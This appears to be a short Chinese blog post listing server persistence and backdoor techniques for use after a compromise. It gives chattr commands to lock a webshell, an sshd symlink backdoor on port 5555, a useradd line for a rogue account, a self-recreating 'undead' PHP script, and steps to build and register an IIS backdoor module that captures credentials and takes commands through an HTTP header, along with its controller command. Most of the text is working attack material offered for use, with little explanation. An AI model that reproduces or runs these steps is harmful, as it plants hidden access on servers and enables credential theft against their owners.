文件上锁
chattr +i webshell.php
lsattr webshell.php
chattr -i webshell.php
ssh 软链接
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
useradd test -p test
不死马
访问该 php 文件,会生成一个木马文件用于连接
<?php
ignore_user_abort();
set_time_limit(0);
$interval = 5;
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>
iis 后门
https://github.com/ygwlgGiao/iis-raid-backdoor
使用 vs2019 进行编译,functions.h 可修改配置信息
functions.h
#define COM_HEADER "X-Chrome-Variations" 传输指令和接收数据的头部字段
#define PASS_FILE "C:\Windows\Temp\creds.db" 保存到web请求服务端的位置
#define PASSWORD "SIMPLEPASS" 传输密码
生成后把 IIS-Backdoor.dll 放到 c 盘目录下,放置其他目录下面语句要进行适当的更改
C:Windowssystem32inetsrvAPPCMD.EXE install module /name:iisModule /image:"c:IIS-Backdoor.dll" /add:true
python iis_controller.py --url http://x.x.x.x --password SIMPLEPASS
查看 iis 管理器模块,可发现新增的内容
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容